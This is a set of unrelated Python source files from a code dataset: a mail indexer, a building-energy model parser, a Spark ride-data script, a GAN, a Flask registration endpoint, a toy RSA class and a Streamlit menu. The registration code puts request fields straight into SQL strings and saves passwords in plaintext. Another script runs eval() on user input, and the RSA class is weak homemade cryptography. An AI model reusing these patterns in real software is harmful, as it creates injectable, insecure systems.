self.__glossshlv[term]\n for tuple in [(vect[0], self.__fromshlv, 0, 0), (vect[1], self.__subjshlv, 2, 1), (vect[2], self.__bodyshlv, 3, 2)]:\n dict = tuple[1]\n part_content = self.__cacheshlv[mail.id][tuple[2]]\n if dict.has_key(code):\n number_of_term_in_part = float(dict[code].count(mail.id))\n \n number_of_terms_in_part = float(helper[mail.id][tuple[3]])\n \n number_of_parts = float(self.__cacheshlv.__len__())\n number_of_parts_with_term = float(dict[code].__len__())\n \n tf_idf_value = utils.tf_idf(number_of_term_in_part, number_of_terms_in_part, number_of_parts_with_term, number_of_parts)\n \n if tf_idf_value != 0:\n tuple[0][code] = tf_idf_value\n \n else:\n #nothing to do here\n pass\n \n \n \n self.__vectorshlv[mail.id] = vect\n self.__glossshlv[self.GENCODELBL] = self.GENCODE\n \n #close the dictionaries\n self.sync()\n\n def update_by_date(self, toIndex):\n self.__init__(toIndex, init=False)\n \n def full_update(self, toIndex):\n self.__init__(toIndex)\n\n def generateCode(self):\n self.GENCODE = self.GENCODE + 1\n return self.GENCODE\n \ndef main():\n pass\n \nif __name__==\"__main__\":\n main()\n","sub_path":"services/indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":7469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"134226806","text":"from .sbem_model import *\nimport re\nfrom .sbem_hvac_system import *\nfrom .sbem_general import *\nfrom .sbem_compliance import *\nfrom .sbem_construction import *\nfrom .sbem_dhw_generator import *\n# from .sbem_glass import *\nclass SbemInpModel(SbemModel): \n OBJECT_MATCH_REGEX = re.compile(\"^\\s*\\\"([^\\\"]+)\\\"\\s*=\\s*([A-Z\\-]+)([\\s\\S]*?)(?=\\.\\.(?=[\\n\\r\\s]+))\", re.MULTILINE)\n OBJECT_PROPERTY_REGEX = re.compile(\"^\\s*([0-9A-Z\\-]+)\\s*=\\s*(.+)\\s*$\", re.MULTILINE)\n def __init__(self, text):\n self.classifiedObjects = {SbemObject:[],\n SbemHvacSystem:[],\n SbemZone:[],\n SbemWall:[],\n SbemWindow:[],\n SbemDhwGenerator:[],\n SbemGlass:[],\n SbemConstruction:[],\n SbemDoor:[]}\n \n self.objects = SbemObjectSet()\n self.dhws = SbemObjectSet()\n self.hvacs = SbemObjectSet()\n self.glasses = SbemObjectSet()\n self.constructions = SbemObjectSet()\n self.epcObject = None\n js = {\"hvacs\":[], \"constructions\":[], \"glasses\":[], \"dhws\":[]}\n curHvac = False\n curZone = False\n curWall = False\n \n hvacs = []\n isNumber = re.compile(\"^-?\\d+\\.?\\d*$\")\n for match in self.OBJECT_MATCH_REGEX.findall(text):\n # Fix issue whereby \n \n obj = {\"name\":match[0],\"props\":{}}\n for prop in self.OBJECT_PROPERTY_REGEX.findall(match[2]):\n obj[\"props\"][prop[0]] = prop[1] if not isNumber.match(prop[1]) else float(prop[1])\n obj[\"area\"] = obj[\"props\"][\"AREA\"] if \"AREA\" in obj[\"props\"] else 0\n if match[1] == \"GENERAL\":\n self.general = SbemGeneral(self,obj)\n js[\"general\"] = obj\n elif match[1] == \"CONSTRUCTION\":\n con = SbemConstruction(self,obj)\n self.constructions.append(con)\n self.classifiedObjects[SbemConstruction].append(con)\n js[\"constructions\"].append(obj)\n elif match[1] == \"GLASS\":\n glass = SbemGlass(self,obj)\n self.glasses.append(glass)\n self.classifiedObjects[SbemGlass].append(glass)\n js[\"glasses\"].append(obj)\n elif match[1] == \"COMPLIANCE\":\n self.compliance = SbemCompliance(self,obj)\n js[\"compliance\"] = obj\n elif match[1] == \"DHW-GENERATOR\":\n if not self.dhws:\n self.dhws = SbemObjectSet()\n dhw = SbemDhwGenerator(self, obj)\n self.dhws.append(dhw)\n self.objects.append(dhw)\n js[\"dhws\"].append(obj)\n elif match[1] == \"HVAC-SYSTEM\":\n curHvac = obj\n curHvac[\"zones\"] = []\n hvacs.append(curHvac)\n js[\"hvacs\"].append(curHvac)\n elif match[1] == \"ZONE\":\n curZone = obj\n curHvac[\"zones\"].append(curZone)\n curZone[\"walls\"] = []\n elif match[1] == \"WALL\":\n curWall = obj\n curZone[\"walls\"].append(curWall)\n curWall[\"windows\"] = []\n curWall[\"doors\"] = []\n elif match[1] == \"WINDOW\":\n curWall[\"windows\"].append(obj)\n elif match[1] == \"DOOR\":\n curWall[\"doors\"].append(obj)\n else:\n obj = SbemObject(self, obj)\n self.objects.append(obj)\n self.classifiedObjects[SbemObject].append(obj)\n super(self.__class__,self).__init__(js)\n\n @classmethod \n def extractSpecificObjectType(self,text, key, delegate=SbemObject):\n pat = re.compile(\"^\\s*\\\"([^\\\"]+)\\\"\\s*=\\s*%s([A-Z\\-]+)([\\s\\S]*?)(?=\\.\\.)\" %(key))\n output = SbemObjectSet()\n for match in pat.findall(text):\n props = {} \n for prop in OBJECT_PROPERTY_REGEX.findall(match[2]):\n props[prop[0]] = prop[1]\n output.append(delegate({\"name\": match[0], \"props\": props}))\n return output\n \n \n ","sub_path":"lib/sbem_model/sbem_inp_model.py","file_name":"sbem_inp_model.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"127538614","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 11 14:28:30 2020\n\n@author: oliviaroberts\n\"\"\"\nfrom pyspark.sql.functions import lit\nfrom pyspark.sql.functions import udf\nfrom pyspark.sql.functions import rand \nfrom pyspark.sql.types import FloatType\nfrom shapely.geometry import Point\nimport geopandas as gpd\n\n# Read csv\nuber_df = spark.read.csv(\"uber14.csv\", inferSchema = True, header = True)\nnyc = gpd.read_file('NYC_map/nyc.shp')\n\n# Change lat/long to float\nuber_df = uber_df.withColumn(\"Lat\", uber_df[\"Lat\"].cast(FloatType()))\nuber_df = uber_df.withColumn(\"Lon\", uber_df[\"Lon\"].cast(FloatType()))\n\n# Add columns: Burrow , Month\nuber_df = uber_df.withColumn('Burrow', lit(None))\nuber_df = uber_df.withColumn('Month', lit(None))\n\n# Take sample\nsample_uber_df = uber_df.select(\"*\").orderBy(rand()).limit(100000)\n\ndef burrow_column(X, Y):\n point = Point(Y, X)\n if nyc['geometry'][0].contains(point):\n return('Bronx')\n if nyc['geometry'][1].contains(point):\n return('Staten Island')\n if nyc['geometry'][2].contains(point):\n return('Brooklyn')\n if nyc['geometry'][3].contains(point):\n return('Queens')\n if nyc['geometry'][4].contains(point):\n return('Manhattan')\n\ndef month_column(X):\n if X[0] == '4':\n return(\"April\")\n if X[0] == '5':\n return(\"May\")\n if X[0] == '6':\n return(\"June\")\n if X[0] == '7':\n return(\"July\")\n if X[0] == '8':\n return(\"August\")\n if X[0] == '9':\n return(\"September\")\n\nfunc = udf(burrow_column)\nsample_uber_df = sample_uber_df.withColumn('Burrow', func(sample_uber_df['Lat'], sample_uber_df['Lon']))\n\nfunc = udf(month_column)\nsample_uber_df = sample_uber_df.withColumn('Month', func(sample_uber_df['Date/Time']))\n\n# Dropping nulls\nsample_uber_df = sample_uber_df.filter((sample_uber_df.Month != 'null'))\nsample_uber_df = sample_uber_df.filter((sample_uber_df.Burrow != 'null'))\n\n# Write to csv\nsample_uber_df.write.format(\"csv\").save('burrows.csv', header = 'true')\n\n\n\n#### Extras ####\nuber_df.createOrReplaceTempView(\"Uber\")\nnew_df = sqlContext.sql(\"select count(*) from Uber\")\nnew_df = uber_df.groupby(uber_df.Burrow).count()\nX = taxi_df.select(\"pickup_datetime\").collect()[0] \nY = uber_df.select(\"Lon\").collect()[0] \n","sub_path":"burrow.py","file_name":"burrow.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"590201379","text":"import numpy as np\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nimport pickle\n\ntransform = transforms.Compose([transforms.Resize(64),\n transforms.CenterCrop(64),\n transforms.ToTensor()])\ndataset = torchvision.datasets.ImageFolder(\"drive/MyDrive/celeb_data\",\n transform=transform)\ndata_loader = torch.utils.data.DataLoader(dataset, \n batch_size=128, \n shuffle=True,\n num_workers=0)\n\nimages,_ = next(iter(data_loader))\n\nimg = torch.transpose(images[0], 0,1)\nimg = torch.transpose(img,1,2)\nplt.imshow(img)\n\nclass Discriminator(nn.Module):\n def __init__(self,num_channels,activation_slope=0.2):\n super(Discriminator,self).__init__()\n self.slope = activation_slope\n self.num_channels = num_channels\n self.conv1=nn.Conv2d(in_channels=3,\n out_channels=num_channels,\n kernel_size=3,\n stride=2,\n padding=1)\n self.conv2=nn.Conv2d(in_channels=num_channels,\n out_channels=num_channels*2,\n kernel_size=3,\n stride=2,\n padding=1)\n self.conv3=nn.Conv2d(in_channels=num_channels*2,\n out_channels=num_channels*4,\n kernel_size=3,\n stride=2,\n padding=1)\n self.conv4=nn.Conv2d(in_channels=num_channels*4,\n out_channels=num_channels*8,\n kernel_size=3,\n stride=2,\n padding=1)\n self.conv5=nn.Conv2d(in_channels=num_channels*8,\n out_channels=num_channels*16,\n kernel_size=3,\n stride=2,\n padding=1)\n\n self.dense = nn.Linear(num_channels*16*2*2,1)\n\n\n def forward(self,x):\n\n out=F.leaky_relu(self.conv1(x), self.slope)\n out=F.leaky_relu(self.conv2(out), self.slope)\n out=F.leaky_relu(self.conv3(out), self.slope)\n out=F.leaky_relu(self.conv4(out), self.slope)\n out=F.leaky_relu(self.conv5(out), self.slope) \n out = out.view(-1, self.num_channels*16*2*2)\n out = self.dense(out)\n return out\n\n#Define Discrimnator and test on random input\nD = Discriminator(num_channels=32)\nsample_output = D(images)\nsample_output.shape\n\nclass Generator(nn.Module):\n def __init__(self, num_channels, latent_dim):\n super(Generator, self).__init__()\n self.num_channels = num_channels\n self.latent_dim = latent_dim\n self.mapping = mapping\n\n self.up1 = nn.ConvTranspose2d(in_channels=self.num_channels*16,\n out_channels=num_channels*8,\n stride=2,\n padding=1,\n kernel_size=4)\n \n self.batch1 = nn.BatchNorm2d(num_channels*8)\n self.up2 = nn.ConvTranspose2d(in_channels=self.num_channels*8,\n out_channels=num_channels*4,\n stride=2,\n padding=1,\n kernel_size=4)\n \n self.batch2 = nn.BatchNorm2d(num_channels*4)\n self.up3 = nn.ConvTranspose2d(in_channels=num_channels*4,\n out_channels=num_channels*2,\n stride=2,\n kernel_size=4,\n padding=1)\n \n self.batch3 = nn.BatchNorm2d(num_channels*2)\n self.up4 = nn.ConvTranspose2d(in_channels=num_channels*2,\n out_channels=num_channels,\n stride=2,\n padding=1,\n kernel_size=4)\n \n self.batch4 = nn.BatchNorm2d(num_channels)\n self.up5 = nn.ConvTranspose2d(in_channels=num_channels,\n out_channels=3,\n stride=2,\n padding=1,\n kernel_size=4)\n \n self.dense = nn.Linear(256, self.num_channels*16*2*2)\n\n #Define the AdaIn layers for the mapping network\n self.W1 = nn.Linear(256, num_channels*8)\n self.B1 = nn.Linear(256, num_channels*8)\n\n self.W2 = nn.Linear(256, num_channels*4)\n self.B2 = nn.Linear(256, num_channels*4)\n\n self.W3 = nn.Linear(256, num_channels*2)\n self.B3 = nn.Linear(256, num_channels*2)\n\n self.W4 = nn.Linear(256, num_channels)\n self.B4 = nn.Linear(256, num_channels)\n\n\n \n def forward(self,x):\n out = self.dense(x)\n out = out.view(-1, self.num_channels*16,2,2)\n out = F.normalize(F.relu(self.batch1(self.up1(out))),dim=1)\n A_w = self.W1(x).view(-1,self.num_channels*8,1,1)\n A_b = self.B1(x).view(-1,self.num_channels*8,1,1)\n out = A_w*out + A_b\n out = F.normalize(F.relu(self.batch2(self.up2(out))))\n A_w = self.W2(x).view(-1,self.num_channels*4,1,1)\n A_b = self.B2(x).view(-1,self.num_channels*4,1,1)\n out = A_w*out + A_b\n out = F.normalize(F.relu(self.batch3(self.up3(out))))\n A_w = self.W3(x).view(-1,self.num_channels*2,1,1)\n A_b = self.B3(x).view(-1,self.num_channels*2,1,1)\n out = A_w*out + A_b\n out = F.normalize(F.relu(self.batch4(self.up4(out))))\n A_w = self.W4(x).view(-1,self.num_channels,1,1)\n A_b = self.B4(x).view(-1,self.num_channels,1,1)\n out = A_w*out + A_b\n out = torch.tanh(self.up5(out))\n return out\n\nclass MappingNetwork(nn.Module):\n def __init__(self, num_layers, latent_dim):\n super(MappingNetwork, self).__init__()\n self.num_layers = num_layers\n self.layers = []\n\n for i in range(self.num_layers):\n self.layers.append(nn.Linear(latent_dim, latent_dim))\n \n self.layers = nn.ModuleList(self.layers)\n \n def forward(self, x):\n for layer in self.layers:\n x = layer(x)\n return x\n\n#Define mapping network instance and test it out\nmapping = MappingNetwork(num_layers=4,latent_dim=256)\nnoise = torch.randn((32,256)).float()\nlatent_code = mapping(noise)\nlatent_code.shape\n\n# Defining generator and trying random input\nG = Generator(num_channels=32,latent_dim=256)\nlatent_code = torch.randn((128,256))\ngenerated_img = G(mapping(latent_code))\ngenerated_img.shape\n\n\n\nif torch.cuda.is_available():\n print(\"CUDA Availaible\")\n D.cuda()\n G.cuda()\n mapping.cuda()\n\n#Hyperparameters\nadam_beta = (0.5,0.999)\nadam_lr = 2e-4\n\ndef D_loss(real,fake,scale=0.95):\n real_batch_size = real.size(0)\n fake_batch_size = fake.size(0)\n \n ones = torch.ones(real_batch_size) * scale\n zeros = torch.zeros(fake_batch_size)\n\n if torch.cuda.is_available():\n ones = ones.cuda()\n zeros = zeros.cuda()\n criterion = nn.BCEWithLogitsLoss()\n real_loss = criterion(real.squeeze(),ones)\n fake_loss = criterion(fake.squeeze(),zeros)\n return real_loss + fake_loss\n\ndef G_loss(fake):\n batch_size = fake.size(0)\n ones = torch.ones(batch_size)\n\n if torch.cuda.is_available():\n ones = ones.cuda()\n \n criterion=nn.BCEWithLogitsLoss()\n loss = criterion(fake.squeeze(),ones)\n return loss \n \n#Defining Adam Optimizers\n\nd_optimizer = torch.optim.Adam(D.parameters(),lr=adam_lr,betas=adam_beta)\ng_params = list(G.parameters()) + list(mapping.parameters())\ng_optimizer = torch.optim.Adam(g_params,lr=adam_lr,betas=adam_beta)\n\ndef train(num_epochs):\n \n if torch.cuda.is_available():\n D.cuda()\n G.cuda()\n mapping.cuda()\n\n samples = []\n losses = []\n\n sample_size = 9\n sample_noise = torch.randn((sample_size, 256)).float()\n \n if torch.cuda.is_available():\n sample_noise = sample_noise.cuda()\n\n for epoch in range(num_epochs):\n\n for batch_i, (images, _) in enumerate(data_loader):\n print(\"EPOCH : \",epoch, \"BATCH : \", batch_i)\n batch_size = images.size(0)\n if batch_size != 128:\n continue\n images = images*2.0 - 1.0\n d_optimizer.zero_grad()\n \n if torch.cuda.is_available():\n images = images.cuda()\n \n D_real = D(images)\n\n z = torch.randn((batch_size, 256)).float()\n if torch.cuda.is_available():\n z = z.cuda()\n\n D_fake = D(G(mapping(z)))\n \n d_loss = D_loss(D_real, D_fake)\n d_loss.backward()\n d_optimizer.step()\n\n g_optimizer.zero_grad()\n\n z = torch.randn((batch_size, 256)).float()\n if torch.cuda.is_available():\n z = z.cuda()\n \n D_fake = D(G(mapping(z)))\n g_loss = G_loss(D_fake)\n\n g_loss.backward()\n g_optimizer.step()\n\n if batch_i % 250 == 0:\n\n curr_stats = {\"d_loss\": d_loss.item(), \"g_loss\": g_loss.item()}\n losses.append(curr_stats)\n print('Epoch : {} d_loss: {} g_loss: {}'.format(\n epoch, d_loss.item(), g_loss.item()))\n\n\n G.eval() \n sample_imgs = G(mapping(sample_noise))\n samples.append(sample_imgs)\n G.train()\n\n plot_images(sample_imgs) \n\n with open('samples.pkl', 'wb') as f:\n pickle.dump(samples, f)\n \n torch.save(D.state_dict(), \"discriminator.weights\")\n torch.save(G.state_dict(), \"generator.weights\")\n\n return losses\n\ndef plot_images(images):\n fig, axes = plt.subplots(figsize=(9,9), nrows=3, ncols=3, sharey=True, sharex=True)\n for ax, img in zip(axes.flatten(), images):\n img = img.detach().cpu().numpy()\n img = np.transpose(img, (1, 2, 0))\n img = ((img +1)*255 / (2)).astype(np.uint8) # rescale to pixel range (0-255)\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\n im = ax.imshow(img.reshape((64,64,3)))\n plt.show()\n\nlosses = train(num_epochs=50)\n\n","sub_path":"models/ganwmapping.py","file_name":"ganwmapping.py","file_ext":"py","file_size_in_byte":10322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"503866182","text":"from flask_restful import Resource, reqparse\r\nfrom db import query\r\nfrom flask_jwt_extended import create_access_token, jwt_required\r\nfrom werkzeug.security import safe_str_cmp\r\nimport pymysql\r\n\r\n# this parameter is given globally in this module so that the userdb is changed all over the module if \r\n# changed at one place (here). userdb is set so that while testing locally, \r\n# the local database could have userdb different from 'User'. \r\n# In the database employed for this utility, userdb is 'User'\r\nuserdb = 'User'\r\n\r\n# this resource is defined for the user to register\r\nclass UserRegister(Resource):\r\n\r\n def post(self):\r\n parser = reqparse.RequestParser()\r\n parser.add_argument('uname', type=str, required=True, help=\"uname cannot be left blank!\")\r\n parser.add_argument('password', type=str, required=True, help=\"password cannot be left blank!\")\r\n parser.add_argument('rno', type=str, required=True, help=\"rno cannot be left blank!\")\r\n parser.add_argument('branch_name', type=str, required=True, help=\"branch_name cannot be left blank!\")\r\n parser.add_argument('sem_no', type=str, required=True, help=\"sem_no cannot be left blank!\")\r\n data = parser.parse_args()\r\n \r\n try:\r\n qstr = f\"\"\" \r\n SELECT uname from users where uname = \"{ data['uname'] }\";\r\n \"\"\"\r\n usersWithUname = query(qstr, return_json=False, connect_db=userdb)\r\n \r\n qstr = f\"\"\" \r\n SELECT uname from users where rno = \"{ data['rno'] }\";\r\n \"\"\"\r\n usersWithRoll = query(qstr, return_json=False, connect_db=userdb)\r\n \r\n except Exception as e:\r\n return {\r\n \"message\" : \"There was an error connecting to the Users table while checking for an existing user.\" + str(e)\r\n }, 500\r\n\r\n if len(usersWithUname)>0:\r\n return {\r\n \"message\" : \"A user with the same username exists.\"\r\n }, 400\r\n\r\n if len(usersWithRoll)>0:\r\n return {\r\n \"message\" : \"A user with the same roll number exists.\"\r\n }, 400\r\n\r\n\r\n qstr = f\"\"\" INSERT INTO users values(\"{ data['uname'] }\", \r\n \"{ data['password'] }\", \r\n \"{ data['rno'] }\", \r\n \"{ data['branch_name'] }\", \r\n \"{ data['sem_no'] }\" ); \"\"\"\r\n\r\n try:\r\n query(qstr, connect_db=userdb)\r\n # except (pymysql.err.InternalError, pymysql.err.ProgrammingError, pymysql.err.IntegrityError) as e:\r\n # return {\r\n # \"message\" : \"MySQL error: \" + str(e)\r\n # }, 500\r\n # except Exception as e:\r\n # return {\r\n # \"message\" : \"Cannot create a user.\" + str(e)\r\n # }, 500\r\n except:\r\n return {\r\n \"message\" : \"Cannot create the user.\"\r\n }, 500\r\n \r\n return {\r\n \"message\" : \"Succesfully registered.\"\r\n }, 200","sub_path":"api/qp-api-flask/resources/user_register.py","file_name":"user_register.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"23271145","text":"import random\n\n\n\nclass Rsa:\n BIT_SIZE = 1024\n def __init__(self):\n self.firstPrime = 0\n self.secondPrime = 0\n self.publicKey = 0\n self.privateKey = 0\n self.modulus = 1\n\n def initialize(self):\n \n with open(\"rsaEncryption.rsa\",'r') as file:\n if file.read() == '':\n self.generateKeys()\n else:\n file.seek(0)\n self.firstPrime = int(file.readline())\n self.secondPrime = int(file.readline())\n\n self.modulus = self.firstPrime * self.secondPrime\n\n phi = (self.firstPrime-1) * (self.secondPrime-1)\n\n for number in range(phi,1,-1):\n if self.gcd(phi,number) == 1:\n self.publicKey = number\n break\n \n for number in range(phi,1,-1):\n if (self.publicKey * number) % phi == 1:\n self.privateKey = number\n break\n\n def generateKeys(self):\n self.firstPrime = self.generatePrime()\n self.secondPrime = self.generatePrime()\n \n with open(\"rsaEncryption.rsa\",'w') as file:\n file.write(str(self.firstPrime)+'\\n')\n file.write(str(self.secondPrime))\n\n self.initialize()\n\n def encrypt(self,message):\n ascii_values = []\n char_sequence = []\n\n for index,char in enumerate(message):\n if not (ord(char) in ascii_values):\n ascii_values.append(ord(char))\n char_sequence.append(ascii_values.index(ord(char)))\n \n print('\\n')\n\n cipherNumList = []\n j = 3\n for index,ascii in enumerate(ascii_values):\n if index % 10 == 0:\n j-=1\n backSpace = '\\b'\n if j < 0:\n j = 2\n \n completed = 100 * index/len(ascii_values)\n print('\\tEncrypting...'+backSpace*j,' ','\\tProgress ->',\"{0:.2f}\".format(completed),'%',end = '\\r')\n cipherNumList.append(pow(ascii,self.publicKey,self.modulus))\n \n print('****************** Done!...Data Encrypted! *********************')\n return str(cipherNumList)+'\\n'+str(char_sequence)\n\n def decrypt(self,formattedCipherText):\n formattedCipherText = formattedCipherText.replace(']','',2)\n formattedCipherText = formattedCipherText.replace('[','',2)\n\n end = formattedCipherText.find('\\n')\n cipherNumList = formattedCipherText [:end]\n charSequence = formattedCipherText[end+1:]\n\n cipherNumList = list(cipherNumList.split(','))\n cipherNumList = list(map(int,cipherNumList))\n\n charSequence = list(charSequence.split(','))\n charSequence = list(map(int,charSequence))\n \n decryptedAscii_list = []\n\n print('\\n')\n j = 3\n for index,ascii in enumerate(cipherNumList):\n if index % 10 == 0:\n j-=1\n backSpace = '\\b'\n if j < 0:\n j = 2\n completed = 100 * index/len(cipherNumList)\n print('\\tDecrypting...'+backSpace*j,' ','\\tProgress ->',\"{0:.2f}\".format(completed),'%', end = '\\r')\n decryptedAscii_list.append(pow(ascii,self.privateKey,self.modulus))\n\n #print('****************** Done!...Data Decrypted! *********************')\n actualText = ''\n for asciiValue in charSequence:\n actualText += chr(decryptedAscii_list[asciiValue])\n\n return actualText\n\n def fermat_primality_test(self,number):\n\n if number % 2 == 0:\n return False\n\n evenComponent=number-1\n a=random.randrange(1,number)\n if pow(a,evenComponent,number) == 1:\n return True\n return False\n \n \n def generatePrime(self):\n while True:\n primeCandidate = random.randrange(pow(2,Rsa.BIT_SIZE),pow(2,Rsa.BIT_SIZE+1))\n if self.fermat_primality_test(primeCandidate):\n return primeCandidate\n \n def gcd(self,a,b):\n if b == 0:\n return a\n else:\n return self.gcd(b,a%b)\n","sub_path":"Rsa.py","file_name":"Rsa.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"282771","text":"\n\nimport math\n\nfun_str = input(\"Please input a function: \")\nx_max = float(input(\"Please input x-max: \"))\nx_min = float(input(\"Please input x-min: \"))\nns = int(input(\"Please input the number of points you'd like to graph: \"))\nxs=[]\nys=[]\ni= x_min\nevenly_divided = (x_max-x_min)/ns\nj = 0\nwhile i <= x_max + 1:\n xs.append(i)\n i+=evenly_divided\n print(xs[j], \" \")\n j+=1\n \nfor x in xs:\n y = eval(fun_str)\n ys.append(y)\n\nfirst_line = '{0:<12s} | {1:<12s}'.format('x','y')\nprint(first_line)\nprint('-'*27)\n\nfor i in range(ns+1):\n print('{0:>+12.4f} | {1:>+12.4f}'.format(xs[i],ys[i]))\n #print(xs[i])\n #print(ys[i])'''\n \n\n\n\n'''plot(xs, ys, marker='o', linestyle='-')\nxlabel('x')\nylabel('y')\ntitle(fun_str)\nshow()'''\n","sub_path":"func_vis.py","file_name":"func_vis.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"640619527","text":"import streamlit as st\nimport TEIEntityEnricher.Utils.tei_parser as tp\nimport TEIEntityEnricher.Menu.menu_ner_task_def as ner_task\nimport json\nimport os\n\n\nclass Menu_ner_tei_map():\n def __init__(self, state, show_menu=True):\n self.state = state\n\n self.tnm_Folder = 'TNM'\n self.template_tnm_Folder = os.path.join('TEIEntityEnricher', 'Templates', self.tnm_Folder)\n self.tnm_attr_name = 'name'\n self.tnm_attr_ntd = 'ntd'\n self.tnm_attr_template = 'template'\n self.tnm_mode_add = 'add'\n self.tnm_mode_dupl = 'duplicate'\n self.tnm_mode_edit = 'edit'\n\n if not os.path.isdir(self.tnm_Folder):\n os.mkdir(self.tnm_Folder)\n if not os.path.isdir(self.template_tnm_Folder):\n os.mkdir(self.template_tnm_Folder)\n\n self.mappingslist = []\n for mappingFile in sorted(os.listdir(self.template_tnm_Folder)):\n if mappingFile.endswith('json'):\n with open(os.path.join(self.template_tnm_Folder, mappingFile)) as f:\n self.mappingslist.append(json.load(f))\n for mappingFile in sorted(os.listdir(self.tnm_Folder)):\n if mappingFile.endswith('json'):\n with open(os.path.join(self.tnm_Folder, mappingFile)) as f:\n self.mappingslist.append(json.load(f))\n\n self.mappingdict = {}\n self.editable_mapping_names = []\n for mapping in self.mappingslist:\n self.mappingdict[mapping[self.tnm_attr_name]] = mapping\n if not mapping[self.tnm_attr_template]:\n self.editable_mapping_names.append(mapping[self.tnm_attr_name])\n\n if show_menu:\n self.ntd = ner_task.Menu_ner_task_def(state, show_menu=False)\n self.show()\n\n def validate_and_saving_mapping(self, mapping, mode):\n val = True\n if self.tnm_attr_name not in mapping.keys() or mapping[self.tnm_attr_name] is None or mapping[\n self.tnm_attr_name] == '':\n val = False\n st.error('Please define a name for the mapping before saving!')\n elif os.path.isfile(os.path.join(self.tnm_Folder, mapping[self.tnm_attr_name].replace(' ',\n '_') + '.json')) and mode != self.tnm_mode_edit:\n val = False\n st.error(f'Choose another name. There is already a mapping with name {mapping[self.tnm_attr_name]}!')\n if val:\n mapping[self.tnm_attr_template] = False\n with open(os.path.join(self.tnm_Folder, mapping[self.tnm_attr_name].replace(' ', '_') + '.json'),\n 'w+') as f:\n json.dump(mapping, f)\n self.reset_tnm_edit_states()\n st.experimental_rerun()\n\n def validate_and_delete_mapping(self, mapping):\n val = True\n if val:\n os.remove(os.path.join(self.tnm_Folder, mapping[self.tnm_attr_name].replace(' ', '_') + '.json'))\n self.reset_tnm_edit_states()\n self.state.tnm_sel_mapping_name = None\n st.experimental_rerun()\n\n def reset_tnm_edit_states(self):\n self.state.tnm_name = None\n self.state.tnm_ntd_name = None\n\n def show_editable_mapping_content(self, mode):\n if mode == self.tnm_mode_edit and len(self.editable_mapping_names) < 1:\n st.info(\n 'There are no self-defined TEI NER Entity Mappings to edit in the moment. If you want to edit a template you have to duplicate it.')\n else:\n if self.state.tnm_mode != mode:\n self.reset_tnm_edit_states()\n self.state.tnm_mode = mode\n tnm_mapping_dict = {}\n init_tnm_ntd_name = self.state.tnm_ntd_name\n # init_use_notes=True\n if mode in [self.tnm_mode_dupl, self.tnm_mode_edit]:\n if self.tnm_mode_dupl == mode:\n options = list(self.mappingdict.keys())\n else:\n options = self.editable_mapping_names\n selected_tnm_name = st.selectbox(f'Select a mapping to {mode}!', options, key='tnm' + mode)\n if self.state.tnm_sel_mapping_name != selected_tnm_name:\n self.reset_tnm_edit_states()\n self.state.tnm_sel_mapping_name = selected_tnm_name\n tnm_mapping_dict = self.mappingdict[selected_tnm_name].copy()\n init_tnm_ntd_name = tnm_mapping_dict[self.tnm_attr_ntd][self.ntd.ntd_attr_name]\n if mode == self.tnm_mode_dupl:\n tnm_mapping_dict[self.tnm_attr_name] = ''\n if mode == self.tnm_mode_add:\n tnm_mapping_dict[self.tnm_attr_ntd] = {}\n if mode in [self.tnm_mode_dupl, self.tnm_mode_add]:\n self.state.tnm_name = st.text_input('New TEI NER Entity Mapping Name:', self.state.tnm_name or \"\")\n if self.state.tnm_name:\n tnm_mapping_dict[self.tnm_attr_name] = self.state.tnm_name\n\n self.state.tnm_ntd_name = st.selectbox('Corresponding NER task definition', list(self.ntd.defdict.keys()),\n list(self.ntd.defdict.keys()).index(\n init_tnm_ntd_name) if init_tnm_ntd_name else 0, key='tnm' + mode)\n if st.button('Save TEI NER Entity Mapping', key=mode):\n tnm_mapping_dict[self.tnm_attr_ntd] = self.ntd.defdict[self.state.tnm_ntd_name]\n self.validate_and_saving_mapping(tnm_mapping_dict, mode)\n\n def teinermapadd(self):\n self.show_editable_mapping_content(self.tnm_mode_add)\n\n def teinermapdupl(self):\n self.show_editable_mapping_content(self.tnm_mode_dupl)\n\n def teinermapedit(self):\n self.show_editable_mapping_content(self.tnm_mode_edit)\n\n def teinermapdel(self):\n selected_mapping_name = st.selectbox('Select a mapping to delete!', self.editable_mapping_names)\n if st.button('Delete Selected Mapping'):\n self.validate_and_delete_mapping(self.mappingdict[selected_mapping_name])\n\n def show_edit_environment(self):\n tnm_definer = st.beta_expander(\"Add or edit existing TEI NER Entity Mapping\", expanded=False)\n with tnm_definer:\n options = {\n \"Add TEI NER Entity Mapping\": self.teinermapadd,\n \"Duplicate TEI NER Entity Mapping\": self.teinermapdupl,\n \"Edit TEI NER Entity Mapping\": self.teinermapedit,\n \"Delete TEI NER Entity Mapping\": self.teinermapdel\n }\n self.state.tnm_edit_options = st.radio(\"Edit Options\", tuple(options.keys()), tuple(options.keys()).index(\n self.state.tnm_edit_options) if self.state.tnm_edit_options else 0)\n options[self.state.tnm_edit_options]()\n\n def show_test_environment(self):\n tnm_test_expander = st.beta_expander(\"Test TEI NER Entity Mapping\", expanded=False)\n\n def build_tnm_tablestring(self):\n tablestring = 'Name | NER Task | Template \\n -----|-------|-------'\n for mapping in self.mappingslist:\n if mapping[self.tnm_attr_template]:\n template = 'yes'\n else:\n template = 'no'\n tablestring += '\\n ' + mapping[self.tnm_attr_name] + ' | ' + mapping[self.tnm_attr_ntd][\n self.ntd.ntd_attr_name] + ' | ' + template\n return 